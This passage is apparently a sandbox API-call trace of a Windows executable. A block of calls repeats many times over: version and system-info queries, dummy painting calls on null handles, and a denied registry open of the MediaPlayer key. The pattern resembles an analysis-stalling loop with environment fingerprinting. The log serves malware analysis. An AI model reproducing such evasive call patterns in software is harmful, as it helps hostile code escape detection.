lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.845] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.845] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.845] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.845] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.845] BeginPath (hdc=0x0) returned 0 [0089.845] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.845] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.845] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.845] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.845] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.845] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.846] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.846] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb0401dc [0089.846] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd0401d9 [0089.846] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045737 [0089.846] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045738 [0089.846] CombineRgn (hrgnDst=0x1045737, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=1) returned 1 [0089.846] CombineRgn (hrgnDst=0x1045738, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=4) returned 2 [0089.846] CreateSolidBrush (color=0xff) returned 0x2105736 [0089.846] CreateSolidBrush (color=0xff0000) returned 0x1105739 [0089.846] DeleteObject (ho=0x1105739) returned 1 [0089.846] DeleteObject (ho=0xdd0401d9) returned 1 [0089.846] DeleteObject (ho=0xdb0401dc) returned 1 [0089.846] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.846] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.846] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.846] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.846] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.847] BeginPath (hdc=0x0) returned 0 [0089.847] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.847] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.847] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.847] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.847] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.847] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.847] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.847] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde0401d9 [0089.847] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc0401dc [0089.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104573a [0089.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104573b [0089.847] CombineRgn (hrgnDst=0x104573a, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=1) returned 1 [0089.847] CombineRgn (hrgnDst=0x104573b, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=4) returned 2 [0089.847] CreateSolidBrush (color=0xff) returned 0x2105739 [0089.847] CreateSolidBrush (color=0xff0000) returned 0x110573c [0089.847] DeleteObject (ho=0x110573c) returned 1 [0089.847] DeleteObject (ho=0xdc0401dc) returned 1 [0089.847] DeleteObject (ho=0xde0401d9) returned 1 [0089.847] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.848] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.848] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.848] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.848] BeginPath (hdc=0x0) returned 0 [0089.848] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.848] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.848] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.848] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.848] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd0401dc [0089.848] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf0401d9 [0089.848] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104573d [0089.848] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104573e [0089.848] CombineRgn (hrgnDst=0x104573d, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=1) returned 1 [0089.848] CombineRgn (hrgnDst=0x104573e, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=4) returned 2 [0089.849] CreateSolidBrush (color=0xff) returned 0x210573c [0089.849] CreateSolidBrush (color=0xff0000) returned 0x110573f [0089.849] DeleteObject (ho=0x110573f) returned 1 [0089.849] DeleteObject (ho=0xdf0401d9) returned 1 [0089.849] DeleteObject (ho=0xdd0401dc) returned 1 [0089.849] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.849] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.849] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.849] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.849] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.849] BeginPath (hdc=0x0) returned 0 [0089.849] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.849] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.849] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.849] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.849] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.849] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.849] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.850] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe00401d9 [0089.850] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde0401dc [0089.850] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045740 [0089.850] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045741 [0089.850] CombineRgn (hrgnDst=0x1045740, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=1) returned 1 [0089.850] CombineRgn (hrgnDst=0x1045741, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=4) returned 2 [0089.850] CreateSolidBrush (color=0xff) returned 0x210573f [0089.850] CreateSolidBrush (color=0xff0000) returned 0x1105742 [0089.850] DeleteObject (ho=0x1105742) returned 1 [0089.850] DeleteObject (ho=0xde0401dc) returned 1 [0089.850] DeleteObject (ho=0xe00401d9) returned 1 [0089.850] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.850] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.850] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.850] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.850] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.850] BeginPath (hdc=0x0) returned 0 [0089.850] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.850] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.850] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.850] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.850] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.850] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.851] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.851] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf0401dc [0089.851] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe10401d9 [0089.851] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045743 [0089.851] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045744 [0089.851] CombineRgn (hrgnDst=0x1045743, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=1) returned 1 [0089.851] CombineRgn (hrgnDst=0x1045744, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=4) returned 2 [0089.851] CreateSolidBrush (color=0xff) returned 0x2105742 [0089.851] CreateSolidBrush (color=0xff0000) returned 0x1105745 [0089.851] DeleteObject (ho=0x1105745) returned 1 [0089.851] DeleteObject (ho=0xe10401d9) returned 1 [0089.851] DeleteObject (ho=0xdf0401dc) returned 1 [0089.851] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.851] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.851] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.851] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.851] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.851] BeginPath (hdc=0x0) returned 0 [0089.851] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.852] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.852] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.852] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.852] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.852] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.852] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.852] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.852] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe20401d9 [0089.852] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe00401dc [0089.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045746 [0089.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045747 [0089.852] CombineRgn (hrgnDst=0x1045746, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=1) returned 1 [0089.852] CombineRgn (hrgnDst=0x1045747, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=4) returned 2 [0089.852] CreateSolidBrush (color=0xff) returned 0x2105745 [0089.852] CreateSolidBrush (color=0xff0000) returned 0x1105748 [0089.852] DeleteObject (ho=0x1105748) returned 1 [0089.852] DeleteObject (ho=0xe00401dc) returned 1 [0089.852] DeleteObject (ho=0xe20401d9) returned 1 [0089.852] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.853] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.853] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.853] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.853] BeginPath (hdc=0x0) returned 0 [0089.853] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.853] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.853] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.853] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.853] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe10401dc [0089.853] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe30401d9 [0089.853] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045749 [0089.853] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104574a [0089.853] CombineRgn (hrgnDst=0x1045749, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=1) returned 1 [0089.854] CombineRgn (hrgnDst=0x104574a, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=4) returned 2 [0089.854] CreateSolidBrush (color=0xff) returned 0x2105748 [0089.854] CreateSolidBrush (color=0xff0000) returned 0x110574b [0089.854] DeleteObject (ho=0x110574b) returned 1 [0089.854] DeleteObject (ho=0xe30401d9) returned 1 [0089.854] DeleteObject (ho=0xe10401dc) returned 1 [0089.854] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.854] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.854] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.854] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.854] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.854] BeginPath (hdc=0x0) returned 0 [0089.854] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.854] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.854] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.854] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.854] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.854] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.854] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.855] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe40401d9 [0089.855] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe20401dc [0089.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104574c [0089.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104574d [0089.855] CombineRgn (hrgnDst=0x104574c, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=1) returned 1 [0089.855] CombineRgn (hrgnDst=0x104574d, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=4) returned 2 [0089.855] CreateSolidBrush (color=0xff) returned 0x210574b [0089.855] CreateSolidBrush (color=0xff0000) returned 0x110574e [0089.855] DeleteObject (ho=0x110574e) returned 1 [0089.855] DeleteObject (ho=0xe20401dc) returned 1 [0089.855] DeleteObject (ho=0xe40401d9) returned 1 [0089.855] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.855] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.855] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.855] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.855] BeginPath (hdc=0x0) returned 0 [0089.855] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.855] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.855] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.855] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.855] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.856] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.856] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.856] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe30401dc [0089.856] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe50401d9 [0089.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104574f [0089.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045750 [0089.856] CombineRgn (hrgnDst=0x104574f, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=1) returned 1 [0089.856] CombineRgn (hrgnDst=0x1045750, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=4) returned 2 [0089.856] CreateSolidBrush (color=0xff) returned 0x210574e [0089.856] CreateSolidBrush (color=0xff0000) returned 0x1105751 [0089.856] DeleteObject (ho=0x1105751) returned 1 [0089.856] DeleteObject (ho=0xe50401d9) returned 1 [0089.856] DeleteObject (ho=0xe30401dc) returned 1 [0089.856] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.856] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.856] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.856] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.856] BeginPath (hdc=0x0) returned 0 [0089.857] MoveToEx (in: 